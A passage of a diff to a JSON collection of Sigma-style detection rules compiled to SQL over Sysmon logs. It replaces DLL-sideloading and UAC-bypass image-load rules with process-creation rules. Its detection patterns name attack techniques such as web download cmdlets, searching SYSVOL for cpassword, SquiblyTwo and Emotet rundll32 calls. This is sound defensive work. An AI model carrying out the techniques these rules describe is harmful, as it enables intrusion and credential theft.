'%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" ], - "filename": "image_load_office_dotnet_gac_dll_load.yml" + "filename": "proc_creation_win_hktl_uacme.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", - "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", - "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "title": "Ruby Inline Command Execution", + "id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", + "status": "experimental", + "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ruby.exe' ESCAPE '\\' OR OriginalFileName = 'ruby.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" ], - "filename": "image_load_dcom_iertutil_dll_hijack.yml" + "filename": "proc_creation_win_ruby_inline_command_execution.yml" }, { - "title": "UAC Bypass With Fake DLL", - "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "status": "test", - "description": "Attempts to load dismcore.dll after dropping it", - "author": "oscd.community, Dmitry Uchakin", + "title": "Suspicious Schtasks Schedule Type With High Privileges", + "id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "status": "experimental", + "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Actions of a legitimate telnet client" + "Some installers were seen using this method of creation unfortunately. Filter them in your environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\') AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))" ], - "filename": "image_load_uac_bypass_via_dism.yml" + "filename": "proc_creation_win_schtasks_schedule_type_system.yml" }, { - "title": "Potential DLL Sideloading Via JsSchHlp", - "id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", + "title": "Modify Group Policy Settings", + "id": "ada4b0c4-758b-46ac-9033-9004613a150d", "status": "experimental", - "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.persistence", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1484.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\JSESPR.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\Justsystem\\\\JsSchHlp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (CommandLine LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR CommandLine LIKE '%EnableSmartScreen%' ESCAPE '\\' OR CommandLine LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_jsschhlp.yml" + "filename": "proc_creation_win_reg_modify_group_policy_settings.yml" }, { - "title": "Fax Service DLL Search Order Hijack", - "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "title": "Whoami Utility Execution", + "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", "status": "test", - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", - "author": "NVISO", + "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unlikely" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe'))" ], - "filename": "image_load_side_load_ualapi.yml" + "filename": "proc_creation_win_whoami_execution.yml" }, { - "title": "Microsoft Office DLL Sideload", - "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "title": "Suspicious Rundll32 Without Any CommandLine Params", + "id": "1775e15e-b61b-4d14-a1a3-80981298085a", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Possible but rare" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" - ], - "filename": "image_load_side_load_office_dlls.yml" - }, - { - "title": "PowerShell Core DLL Loaded By Non PowerShell Process", - "id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", - "status": "experimental", - "description": "Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. Detects behaviour similar to meterpreter's \"load powershell\" extension.", - "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", - "tags": [ - "attack.t1059.001", - "attack.execution" - ], - "falsepositives": [ - "Used by some .NET binaries, minimal on user workstation.", - "Used by Microsoft SQL Server Management Studio" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\System.Management.Automation.Dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\System.Management.Automation.ni.Dll' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\dsac.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\RemoteFXvGPUDisablement.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR Image LIKE '%\\\\syncappvpublishingserver.exe' ESCAPE '\\' OR Image LIKE '%\\\\runscripthelper.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServerManager.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SQL Server Management Studio %\\\\Common%\\\\IDE\\\\Ssms.exe' ESCAPE '\\' OR Image LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.VSDetouredHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.SettingsHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.Host.CLR.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\ConfigSync\\\\ConfigSyncRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (Image = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" ], - "filename": "image_load_dll_system_management_automation_susp_load.yml" + "filename": "proc_creation_win_rundll32_no_params.yml" }, { - "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", - "id": "48bfd177-7cf2-412b-ad77-baf923489e82", - "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "title": "Potential Emotet Rundll32 Execution", + "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "status": "test", + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "author": "FPT.EagleEye", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\tracker.exe' ESCAPE '\\')))" ], - "filename": "image_load_dll_vsstrace_susp_load.yml" + "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" }, { - "title": "Potential DLL Sideloading Via ClassicExplorer32.dll", - "id": "caa02837-f659-466f-bca6-48bde2826ab4", - "status": "experimental", - "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", - "author": "frack113", + "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", + "id": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "status": "test", + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1216" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\ClassicExplorer32.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Classic Shell\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%winrm%' ESCAPE '\\' AND (CommandLine LIKE '%format:pretty%' ESCAPE '\\' OR CommandLine LIKE '%format:\"pretty\"%' ESCAPE '\\' OR CommandLine LIKE '%format:\"text\"%' ESCAPE '\\' OR CommandLine LIKE '%format:text%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_classicexplorer32.yml" + "filename": "proc_creation_win_winrm_awl_bypass.yml" }, { - "title": "Pingback Backdoor DLL Loading Activity", - "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "status": "experimental", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Usage Of Web Request Commands And Cmdlets", + "id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", + "status": "test", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", + "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR CommandLine LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\'))" ], - "filename": "image_load_malware_pingback_backdoor.yml" + "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" }, { - "title": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", - "id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", - "status": "test", - "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indciates WMI ActiveScriptEventConsumers EventConsumers activity.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Sigverif Execution", + "id": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "status": "experimental", + "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemdisp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshom.ocx' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scrrun.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sigverif.exe' ESCAPE '\\')" ], - "filename": "image_load_scrcons_wmi_scripteventconsumer.yml" + "filename": "proc_creation_win_lolbin_sigverif.yml" }, { - "title": "Third Party Software DLL Sideloading", - "id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "title": "Suspicious Workstation Locking via Rundll32", + "id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\commfunc.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\tosbtkbd.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%user32.dll,%' ESCAPE '\\' AND CommandLine LIKE '%LockWorkStation%' ESCAPE '\\')" ], - "filename": "image_load_side_load_third_party.yml" + "filename": "proc_creation_win_rundll32_user32_dll.yml" }, { - "title": "WMI Persistence - Command Line Event Consumer", - "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "title": "Findstr GPP Passwords", + "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "status": "test", - "description": "Detects WMI command line event consumers", - "author": "Thomas Patzke", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "author": "frack113", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" + "filename": "proc_creation_win_findstr_gpp_passwords.yml" }, { - "title": "VBA DLL Loaded Via Office Application", - "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "title": "Remote Access Tool - GoToAssist Execution", + "id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", "status": "test", - "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", - "author": "Antonlovesdnb", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'GoTo Opener' OR Product = 'GoTo Opener' OR Company = 'LogMeIn, Inc.'))" ], - "filename": "image_load_office_vbadll_load.yml" + "filename": "proc_creation_win_remote_access_tools_gotoopener.yml" }, { - "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", - "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", - "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "title": "Potential SquiblyTwo Technique Execution", + "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "status": "test", + "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", + "author": "Markus Neis, Florian Roth", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1047", + "attack.t1220", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe' OR Imphash IN ('1B1A3F43BF37B5BFE60751F2EE2F326E', '37777A96245A3C74EB217308F3546F4C', '9D87C9D67CE724033C0B40CC4CA1B206') OR (Hashes LIKE '%IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=37777A96245A3C74EB217308F3546F4C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206%' ESCAPE '\\')) AND (CommandLine LIKE '%format:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\'))" ], - "filename": "image_load_dll_vssapi_susp_load.yml" + "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml" }, { - "title": "Potential DLL Sideloading Via VMware Xfer", - "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", - "status": "experimental", - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Spool Service Child Process", + "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "status": "test", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 